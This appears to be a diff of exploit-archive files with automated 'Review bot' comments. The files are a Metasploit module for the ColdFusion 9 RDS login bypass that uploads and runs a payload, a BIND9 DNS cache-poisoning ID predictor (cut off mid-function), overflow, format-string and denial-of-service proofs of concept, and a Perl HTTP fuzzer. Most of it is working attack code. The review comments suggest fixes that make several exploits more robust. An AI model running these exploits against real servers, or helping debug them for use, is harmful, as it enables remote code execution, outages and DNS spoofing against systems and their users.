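Review bot: the only PoC content is a link to an external archive (`http://www.exploit-db.com/sploits/30142.zip`) that is not part of the commit, so nothing here can be reviewed; recording the archive's hash and a one-line description of what it contains would let readers verify they have the intended file.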

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/24436/info
Firebird SQL is prone to a remote buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary machine code in the context of the affected database server. Failed exploit attempts will likely crash the server, denying service to legitimate users.
Firebird SQL 2.0 is vulnerable; previous versions may also be affected.
typedef struct p_cnct
{
P_OP p_cnct_operation; /* OP_CREATE or OP_OPEN */
USHORT p_cnct_cversion; /* Version of connect protocol */
P_ARCH p_cnct_client; /* Architecture of client */
CSTRING p_cnct_file; /* File name */
USHORT p_cnct_count; /* Protocol versions understood */
CSTRING p_cnct_user_id; /* User identification stuff */
struct p_cnct_repeat
{
USHORT p_cnct_version; /* Protocol version number */
P_ARCH p_cnct_architecture; /* Architecture of client */
USHORT p_cnct_min_type; /* Minimum type */
USHORT p_cnct_max_type; /* Maximum type */
USHORT p_cnct_weight; /* Preference weight */
}
p_cnct_versions[10];
} P_CNCT;
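Review bot: the file ends at the `P_CNCT` definition without saying which field is involved in the overflow, leaving the reader to guess; if the point is the client-supplied `p_cnct_count` (`Protocol versions understood`) against the fixed `p_cnct_versions[10]` array, a one-line comment saying that the count must be bounds-checked against the array would make the entry useful. As written it is neither a compilable C file (the description prose sits above the `typedef`, and `P_OP`, `USHORT`, `P_ARCH` and `CSTRING` are undefined) nor a self-contained advisory.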

@ -154,6 +154,6 @@ return buffer;
main(int argc, char **argv)
{
talk(IP, "cool");
}
// milw0rm.com [2004-06-25]
}
// milw0rm.com [2004-06-25]

platforms/multiple/dos/30139.c Executable file (111 lines)
@ -0,0 +1,111 @@
source: http://www.securityfocus.com/bid/24284/info
Outpost Firewall is prone to a local denial-of-service vulnerability.
An attacker can exploit this issue to block arbitrary processes, denying service to legitimate users.
This issue affects Outpost Firewall 4.0 build 1007.591.145 and build 964.582.059; other versions may also be affected.
/*
Testing program for Enforcing system reboot with \"outpost_ipc_hdr\" mutex (BTP00002P004AO)
Usage:
prog
(the program is executed without special arguments)
Description:
This program calls standard Windows API to open and capture mutex. Then an attempt to create a child process
causes the deadlock. To terminate this testing program and to release the mutex press Ctrl+C.
Test:
Running the testing program.
*/
#include <stdio.h>
#include <windows.h>
#include <ddk/ntapi.h>
void about(void)
{
printf("Testing program for Enforcing system reboot with \"outpost_ipc_hdr\" mutex (BTP00002P004AO)\n");
printf("Windows Personal Firewall analysis project\n");
printf("Copyright 2007 by Matousec - Transparent security\n");
printf("http://www.matousec.com/""\n\n");
return;
}
void usage(void)
{
printf("Usage: test\n"
" (the program is executed without special arguments)\n");
return;
}
void print_last_error()
{
LPTSTR buf;
DWORD code=GetLastError();
if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
{
fprintf(stderr,"Error code: %ld\n",code);
fprintf(stderr,"Error message: %s",buf);
LocalFree(buf);
} else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
return;
}
HANDLE capture_mutex(char *name)
{
wchar_t namew[MAX_PATH];
snwprintf(namew,MAX_PATH,L"%S",name);
UNICODE_STRING uniname;
RtlInitUnicodeString(&uniname,namew);
OBJECT_ATTRIBUTES oa;
InitializeObjectAttributes(&oa,&uniname,OBJ_CASE_INSENSITIVE | OBJ_OPENIF,0,NULL);
HANDLE mutex;
DWORD access=MUTANT_ALL_ACCESS;
NTSTATUS status=ZwOpenMutant(&mutex,access,&oa);
if (!NT_SUCCESS(status)) return 0;
printf("Mutex opened.\n");
if (WaitForSingleObject(mutex,5000)==WAIT_OBJECT_0) return mutex;
ZwClose(mutex);
return NULL;
}
int main(int argc,char **argv)
{
about();
if (argc!=1)
{
usage();
return 1;
}
while (1)
{
HANDLE mutex=capture_mutex("\\BaseNamedObjects\\outpost_ipc_hdr");
if (mutex)
{
printf("Mutex captured.\n"
"Running system shell. This action will block the system.\n");
WinExec("cmd",SW_NORMAL);
} else
{
fprintf(stderr,"Unable to capture \"outpost_ipc_hdr\" mutex.\n");
break;
}
}
printf("\nTEST FAILED!\n");
return 1;
}
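Review bot: the `source:` line and the three description lines above the opening `/*` are outside any comment, so 30139.c will not compile as committed; move them into the comment block. Within the code, `capture_mutex` returns `0` on one failure path and `NULL` on the other, and `print_last_error` is defined but never called, so a failing `ZwOpenMutant` or `WaitForSingleObject` surfaces only as the generic "Unable to capture" message; calling it on that branch would make the test's own failure modes diagnosable. The build is also tied to MinGW (`#include <ddk/ntapi.h>`, and `snwprintf` is the MinGW spelling, `_snwprintf` under MSVC); a comment naming the expected toolchain would help.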

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/24373/info
K9 Web Protection is prone to a buffer-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer.
An attacker could leverage this issue to execute arbitrary code with administrative privileges. A successful exploit could result in the complete compromise of the affected system.
K9 Web Protection 3.2.36 is reported vulnerable; other versions may be affected as well.
<html>
<head>
<title>CSIS.DK - BlueCoat K9 Web Protection Overflow</title>
<center>
</center>
</head>
<body>
<h4><center> Discovery and Exploit by Dennis Rand - CSIS.DK</h4></center>
<br><b>http://127.0.0.1:2372/home.html[Ax168][DCBA][A x 56][BBBB][AAAA] </b><br>
<br><li> Return Address = DCBA
<br><li> Pointer to the next SEH record = BBBB
<br><li> SE Handler = AAAA
<br>
<center>
<b><A
HREF="http://127.0.0.1:2372/home.htmlAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCC
CDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGHHHHHHHHHHHH
HHHHaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbccccccccDCBAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCC
CCCCCCCCCCCCCDDDDDDDDaaaabbbb">RUN PoC</A></b>
</center>
</body>
</html>
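Review bot: the markup is mis-nested: `<center></center>` sits inside `<head>`, `<h4><center> ... </h4></center>` closes in the wrong order, and the `href` of the PoC link is broken across four lines, which relies on the URL parser stripping the embedded newlines; putting the attribute on one line and fixing the nesting lets a reader count the bytes against the `[Ax168][DCBA][A x 56][BBBB][AAAA]` legend. The description prose above `<html>` is also outside the document and will render as stray text.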

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24454/info
Mbedthis AppWeb is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
This issue affects only applications that were built with logging enabled and installed with no "ErrorLog" directive in 'appweb.conf'.
Successful exploits may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely crash the application, denying further service to legitimate users.
AppWeb 2.2.2 is reported vulnerable; other versions may also be affected.
'GET %n://localhost:80/" request'
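Review bot: the single PoC line has unbalanced quoting (`'GET %n://localhost:80/" request'`), so it is unclear whether the literal request line is `GET %n://localhost:80/` or the whole string; since the description says the request reaches the logging format function, write the exact request line once, without the stray quote and trailing word. It would also help to restate the precondition in the same line: the issue applies only to builds with logging enabled and no "ErrorLog" directive in 'appweb.conf', which is the setting to check on a deployed server.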

@ -1,49 +1,49 @@
#!usr/bin/perl -w
########################################################################################
#
# Reference:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0478
# http://www.securityfocus.com/bid/33604/discuss
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
# Visit: http://www.evilfingers.com/
# Author: Praveen Dar$hanam
# Email: praveen[underscore]recker[at]sify.com\
# Blog: http://www.darshanams.blogspot.com/
# Date: 09th February, 2009
#
############Special thanx2 Joshua Morin, Mikko Varpiola, and Jukka Taimisto ############
########################################################################################
######Thanx to str0ke,milw0rm, @rp m@n,security folks and all INDIAN H@CKER$############
########################################################################################
use IO::Socket;
print("\nEnter IP Address of Vulnerable Server: \n");
$vuln_server_ip = <STDIN>;
chomp($vuln_server_ip);
@malicious_version=("9.9","%.%","%%","#.#","\$.\$","*.*","975.975","10000999");
foreach $mal (@malicious_version)
{
$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_server_ip,
PeerPort => 80,
Proto => 'tcp') || "Unable to connect to HTTP Server";
$http_attack = "GET / HTTP/$mal\r\n".
"Host: $vuln_server_ip\r\n".
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n\r\n";
print $sock_http $http_attack;
sleep(3);
close($sock_http);
}
# milw0rm.com [2009-02-09]
#!usr/bin/perl -w
########################################################################################
#
# Reference:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0478
# http://www.securityfocus.com/bid/33604/discuss
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
# Visit: http://www.evilfingers.com/
# Author: Praveen Dar$hanam
# Email: praveen[underscore]recker[at]sify.com\
# Blog: http://www.darshanams.blogspot.com/
# Date: 09th February, 2009
#
############Special thanx2 Joshua Morin, Mikko Varpiola, and Jukka Taimisto ############
########################################################################################
######Thanx to str0ke,milw0rm, @rp m@n,security folks and all INDIAN H@CKER$############
########################################################################################
use IO::Socket;
print("\nEnter IP Address of Vulnerable Server: \n");
$vuln_server_ip = <STDIN>;
chomp($vuln_server_ip);
@malicious_version=("9.9","%.%","%%","#.#","\$.\$","*.*","975.975","10000999");
foreach $mal (@malicious_version)
{
$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_server_ip,
PeerPort => 80,
Proto => 'tcp') || "Unable to connect to HTTP Server";
$http_attack = "GET / HTTP/$mal\r\n".
"Host: $vuln_server_ip\r\n".
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n\r\n";
print $sock_http $http_attack;
sleep(3);
close($sock_http);
}
# milw0rm.com [2009-02-09]
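Review bot: the shebang `#!usr/bin/perl -w` is missing the leading slash, so the script cannot be executed directly and only runs via `perl script.pl`. The connect error handling is also inert: `IO::Socket::INET->new(...) || "Unable to connect to HTTP Server"` never reports anything, it just assigns that string to `$sock_http` on failure, after which `print $sock_http $http_attack` writes to a filehandle named by the string and warns about an unopened filehandle; use `or die "Unable to connect to HTTP Server: $!"`. The old and new sides of the hunk are otherwise identical (line-ending-only change).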

@ -0,0 +1,245 @@
Document Title:
===============
Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1165
Release Date:
=============
2013-12-09
Vulnerability Laboratory ID (VL-ID):
====================================
1165
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
View your entire photo library in a standard web browser! Show off your photos easily! Excellent for showing slides
during a meeting, browsing through friends photos and more!
- View your photos in a browser over WiFi
- Optional password protection
- Show albums, events, faces (your photo library needs to have these albums in order to show it)
- One click slideshows
- Easy navigation
- Supports bonjour publishing
(Copy of the Homepage: https://itunes.apple.com/app/id499204622 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the SharkFood Air Gallery 1.0 Air Photo Browser mobile application for Apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
SharkFood
Product: Air Gallery - Air Photo Browser iOS 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local command/path injection web vulnerabilities has been discovered in the SharkFood Air Gallery 1.0 Air Photo Browser mobile application for Apple iOS.
A local command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the vulnerable `devicename` value of the file dir und sub category `header` (header-title) section. Local attackers are
able to inject own malicious system specific commands or path value requests as the physical iOS hardware devicename. The execute of the injected
command or path request occurs with persistent attack vector in the index and sub category list of the web interface. The security risk of the local
command/path inject vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.5(+)|(-)6.6.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execute of system specific commands or unauthorized path requests.
Vulnerable Module(s):
[+] Content > header-title
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index- File Dir Listing
[+] Sub Folder/Category - File Dir Listing
1.2
A local command/path injection web vulnerability has been discovered in the SharkFood Air Gallery 1.0 Air Photo Browser mobile application for Apple iOS.
A local command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The second local command/path inject vulnerability is located in the in the album name value of the web-interface index and sub category list module.
Local attackers are able to manipulate iOS device `photo app` (default) album names by the inject of a payload to the wrong encoded albumname input fields.
The execute of the injected command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.6(+).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access and no direct user interaction.
Successful exploitation of the vulnerability results unauthorized execution of system specific commands or unauthorized path requests.
Vulnerable Module(s):
[+] Poster > group-header > groupinfo
Vulnerable Parameter(s):
[+] album name
Affected Module(s):
[+] Index - Item Name List
[+] Sub Category - Title List
Proof of Concept (PoC):
=======================
1.1
The local command/path inject web vulnerability can be exploited by local attackers with restricted or low privileged device user account
without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
1. Install the vulnerable mobile application to your ios device (iphone, mac or ipad)
2. Open the settings menu in the mobile iOS and click the info button to have an influence on the devicename value
3. Now change the local devicename value to your own script code with a frame + local command inject settings or path request
4. Save the settings and open the vulnerable mobile application
5. Start the web-server via wifi (standard localhost:8080 passwd:empty)
6. Open with another computer via browser the local service, the local command inject or unauthorized path request occurs in the header section
7. Successful reproduce of the local command/path inject vulnerability!
PoC: Content > header-title > devicename
<div id="wrapper" class="fullSize">
<!-- header -->
<div id="header" class="content">
<span id="header-title">Air Photo Browser - devicename bkm?37 >"<<>"x<../[COMMAND/PATH INJECT VULNERABILITY!]></span></div>
<!-- column layout , thanks to Mattew James Tailor! - http://matthewjamestaylor.com/ --> ;)
<div class="colmask leftmenu" id="content-wrapper">
<div class="colright">
<div class="col1wrap">
<!-- right column -->
<div class="col1">
<div style="" id="group-header" class="content ui-helper-hidden">
<img id="group-poster" class="control-button" src="images/placeholder.png">
<h3 id="group-info"></h3>
</div>
1.2
The local command/path inject web vulnerability can be exploited by local attackers with restricted or low privileged device user account
without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
1. Install the vulnerable mobile application to your ios device (iphone, mac or ipad)
2. Open the default photo app in the mobile iOS and click the edit or add button to have an influence on the local albumname value
Note: Now the attackers is able to change an exisiting albumname or can add a new album (name)
3. Include your own script code with a frame + local command inject settings or unauthorized path request
4. Save the settings and open the vulnerable mobile application
5. Start the web-server via wifi (standard localhost:8080 passwd:empty)
6. Open with another computer via web-browser the local service (GET method - index)
Note: The local command inject or unauthorized path request occurs in the groupinfo of the group-header section
7. Successful reproduce of the local command/path inject vulnerability!
PoC: Poster > group-header > groupinfo
<div class="col1">
<div style="display: block;" id="group-header" class="content ui-helper-hidden">
<img id="group-poster" class="control-button" src="/api/poster/?group=0&subgroup=0">
<h3 id="group-info"><b>Photo Library</b> <span id="group-count">0 photos</span></h3>
</div><div style="height: 380.6px;" id="group-content" class="content airGallery">
There are no photos in this album</div>
Reference(s):
http://localhost:8080/
Solution - Fix & Patch:
=======================
1.1
The first local command/path inject web vulnerability can be patched by a secure encode and parse of the vulnerable devicename value in
the web interface header section.
1.2
The second local command/path inject web vulnerability can be patched by a secure parse of the vulnerable albumname value
in the web interface data context listing section.
Security Risk:
==============
1.1
The security risk of the local command/path inject web vulnerability is estimated as high(-).
Local attackers are able to inject own system specific commands but can also unatuhorized request local system path values to
compromise the apple iOS web-application.
1.2
The security risk of the second local command/path inject web vulnerability is estimated as high(-). Local attackers are able to
inject own system specific commands but can also unatuhorized request local system path values to
compromise the apple iOS web-application.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
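Review bot: the evidence in the PoC sections is device-controlled text written unescaped into the app's HTML (`<`, `>` and `"` survive intact in `<span id="header-title">` and the album name lands in `<h3 id="group-info">`), which is the HTML-injection pattern, while the title and risk sections call it "command/path injection" throughout; reconciling the classification with what the markup shows would help triage. The Solution section should name the concrete fix that the evidence implies: HTML-escape `devicename` and album names at the point they are written into `header-title` and `group-info`. Minor: `Copyright ? 2013` is a mis-encoded copyright sign and `file dir und sub category` has a stray German "und".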

@ -0,0 +1,315 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
Rank = GreatRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe ColdFusion 9 Administrative Login Bypass',
'Description' => %q{
Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to bypass authentication using the RDS component. Its password can
by default or by misconfiguration be set to an empty value. This allows you to create a session via the RDS login that
can be carried over to the admin web interface even though the passwords might be different. Therefore bypassing
authentication on the admin web interface which then could lead to arbitrary code execution.
Tested on Windows and Linux with ColdFusion 9.
},
'Author' =>
[
'Scott Buckel', # Vulnerability discovery
'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ "CVE", "2013-0632" ],
[ "EDB", "27755" ],
[ "URL", "http://www.adobe.com/support/security/bulletins/apsb13-03.html" ]
],
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive, #thanks juan!
'Platform' => ['win', 'linux'],
'Targets' =>
[
[ 'Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'Linux',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 08 2013'
))
register_options(
[
OptString.new('EXTURL', [ false, 'An alternative host to request the CFML payload from', "" ]),
OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
], self.class)
register_advanced_options(
[
OptString.new('CFIDDIR', [ true, 'Alternative CFIDE directory', 'CFIDE'])
])
end
def check
uri = target_uri.path
#can we access the admin interface?
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
})
if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/
print_good "#{peer} - Administrator access available"
else
return Exploit::CheckCode::Safe
end
#is it cf9?
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'images', 'loginbackground.jpg')
})
img = Rex::Text.md5(res.body.to_s)
imghash = "596b3fc4f1a0b818979db1cf94a82220"
if img == imghash
print_good "#{peer} - ColdFusion 9 Detected"
else
return Exploit::CheckCode::Safe
end
#can we access the RDS component?
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
'vars_post' => {
'method' => "login",
'adminpassword' => "",
'rdsPasswordAllowed' => "1"
}
})
if res and res.code == 200 and res.body.to_s =~ /true/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
@pl = gen_file_dropper
@payload_url = ""
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
end
exec_payload
else
@payload_url = datastore['EXTURL']
upload_payload
exec_payload
end
end
def primer
@payload_url = get_uri
upload_payload
end
def on_request_uri(cli, request)
if request.uri =~ /#{get_resource}/
send_response(cli, @pl)
end
end
#task scheduler is pretty bad at handling binary files and likes to mess up our meterpreter :-(
#instead we use a CFML filedropper to embed our payload and execute it.
#this also removes the dependancy of using the probe.cfm to execute the file.
def gen_file_dropper
rand_var = rand_text_alpha(8+rand(8))
rand_file = rand_text_alpha(8+rand(8))
if datastore['TARGET'] == 0
rand_file += ".exe"
end
encoded_pl = Rex::Text.encode_base64(generate_payload_exe)
print_status "Building CFML shell..."
#embed payload
shell = ""
shell += " <cfset #{rand_var} = ToBinary( \"#{encoded_pl}\" ) />"
shell += " <cffile action=\"write\" output=\"##{rand_var}#\""
shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
#if linux set correct permissions
if datastore['TARGET'] == 1
shell += " mode = \"700\""
end
shell += "/>"
#clean up our evil .cfm
shell += " <cffile action=\"delete\""
shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##listlast(cgi.script_name,\"/\")#\"/>"
#execute our payload!
shell += " <cfexecute"
shell += " name = \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
shell += " arguments = \"\""
shell += " timeout = \"60\"/>"
return shell
end
def exec_payload
uri = target_uri.path
print_status("#{peer} - Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}")
print_status("#{peer} - Executing payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], @filename)
})
end
def upload_payload
uri = target_uri.path
@filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea
taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea
print_status "#{peer} - Trying to upload payload via scheduled task..."
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
'vars_post' => {
'method' => "login",
'adminpassword' => "",
'rdsPasswordAllowed' => "1"
}
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - RDS component was unreachable")
end
#deal with annoying cookie data prepending (sunglasses)
cookie = res.get_cookies
if res and res.code == 200 and cookie =~ /CFAUTHORIZATION_cfadmin=;(.*)/
cookie = $1
else
fail_with(Failure::Unknown, "#{peer} - Unable to get auth cookie")
end
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
'cookie' => cookie
})
if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/
print_good("#{peer} - Logged in as Administrator!")
else
fail_with(Failure::Unknown, "#{peer} - Login Failed")
end
#get file path gogo
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'settings', 'mappings.cfm'),
'vars_get' => {
'name' => "/CFIDE"
},
'cookie' => cookie
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Mappings URL was unreachable")
end
if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/
file_path = $1
print_good("#{peer} - File path disclosed! #{file_path}")
else
fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
end
print_status("#{peer} - Adding scheduled task")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'),
'vars_post' => {
'TaskName' => taskname,
'Start_Date' => "Nov 1, 2420",
'End_Date' => "",
'Interval' => "",
'ScheduleType' => "Once",
'Operation' => "HTTPRequest",
'ScheduledURL' => @payload_url,
'publish' => "1",
'publish_file' => "#{file_path}\\#{@filename}",
'adminsubmit' => "Submit"
},
'cookie' => cookie
})
unless res and res.code == 200 or res.code == 302 #302s can happen but it still works, http black magic!
fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
end
print_status("#{peer} - Running scheduled task")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
'vars_get' => {
'runtask' => taskname,
'timeout' => "0"
},
'cookie' => cookie
})
if res and res.code == 200 and res.body.to_s =~ /This scheduled task was completed successfully/
print_good("#{peer} - Scheduled task completed successfully")
else
fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
end
print_status("#{peer} - Deleting scheduled task")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
'vars_get' => {
'action' => "delete",
'task' => taskname
},
'cookie' => cookie
})
unless res and res.code == 200
print_error("#{peer} - Scheduled task deletion failed, cleanup might be needed!")
end
end
end
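Review bot: `check` dereferences `res` without a nil guard after the `loginbackground.jpg` request, so `Rex::Text.md5(res.body.to_s)` raises NoMethodError when that request times out, unlike the guarded requests around it; add `return Exploit::CheckCode::Unknown unless res` before it. In `upload_payload`, `unless res and res.code == 200 or res.code == 302` parses as `(res and res.code == 200) or res.code == 302`, so a nil `res` still raises on the second term; write `unless res and (res.code == 200 or res.code == 302)`. `gen_file_dropper` branches on `datastore['TARGET'] == 0` / `== 1`, which depends on the datastore handing back Integers; `target['Platform'] == 'win'` avoids the type question. Minor: `exec_payload` discards `res` without checking it, and "dependancy" in the comment.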

@ -1,228 +1,228 @@
#!/usr/bin/env python
"""
DNS Cache Poison v0.3beta by posedge
based on the Amit Klein paper: http://www.trusteer.com/docs/bind9dns.html
output: <time>:<ip>:<port>: id: <id> q: <query> g: <good> e: <error>
id: ID to predict
q: number of queries from the DNS server (only queries with LSB at 0 in ID)
g: number of good predicted IDs
e: number of errors while trying to predict a *supposed to be* predicted ID
"""
import socket, select, sys, time
from struct import unpack, pack
from socket import htons
_ANSWER_TIME_LIMIT = 1.0 # 1sec
_NAMED_CONF = [[<your_dns1_hostname>, <your_dns1_ip>], \
[<your_dns2_hostname>, <your_dns2_ip>], \
[<etc>, <etc>]]
class BINDSimplePredict:
def __init__(self, txid, bind_9_2_3___9_4_1=True):
self.txid = txid
self.cand = []
if bind_9_2_3___9_4_1 == True:
# For BIND9 v9.2.3-9.4.1:
self.tap1=0x80000057
self.tap2=0x80000062
else:
# For BIND9 v9.0.0-9.2.2:
self.tap1=0xc000002b # (0x80000057>>1)|(1<<31)
self.tap2=0xc0000061 # (0x800000c2>>1)|(1<<31)
self.next = self.run()
return
def run(self):
if (self.txid & 1) != 0:
#print "info: LSB is not 0. Can't predict the next transaction ID."
return False
#print "info: LSB is 0, predicting..."
# One bit shift (assuming the two lsb's are 0 and 0)
for msb in xrange(0, 2):
self.cand.append(((msb<<15)|(self.txid>>1)) & 0xFFFF)
# Two bit shift (assuming the two lsb's are 1 and 1)
# First shift (we know the lsb is 1 in both LFSRs):
v=self.txid
v=(v>>1)^self.tap1^self.tap2
if (v & 1) == 0:
# After the first shift, the lsb becomes 0, so the two LFSRs now have
# identical lsb's: 0 and 0 or 1 and 1
# Second shift:
v1=(v>>1) # 0 and 0
v2=(v>>1)^self.tap1^self.tap2 # 1 and 1
else:
# After the first shift, the lsb becomes 1, so the two LFSRs now have
# different lsb's: 1 and 0 or 0 and 1
# Second shift:
v1=(v>>1)^self.tap1 # 1 and 0
v2=(v>>1)^self.tap2 # 0 and 1
# Also need to enumerate over the 2 msb's we are clueless about
for msbits in xrange(0, 4):
self.cand.append(((msbits<<14)|v1) & 0xFFFF)
self.cand.append(((msbits<<14)|v2) & 0xFFFF)
return True;
class DNSData:
def __init__(self, data):
self.data=data
self.name=''
for i in xrange(12, len(data)):
self.name+=data[i]
if data[i] == '\x00':
break
q_type = unpack(">H", data[i+1:i+3])[0]
if q_type != 1: # only type: A (host address) allowed.
self.name = None
return
def response(self, ip=None):
packet=''
packet+=self.data[0:2] # id
packet+="\x84\x10" # flags
packet+="\x00\x01" # questions
packet+="\x00\x01" # answer RRS
packet+="\x00\x00" # authority RRS
packet+="\x00\x00" # additional RRS
packet+=self.name # queries: name
packet+="\x00\x01" # queries: type (A)
packet+="\x00\x01" # queries: class (IN)
packet+="\xc0\x0c" # answers: name
if ip == None:
packet+="\x00\x05" # answers: type (CNAME)
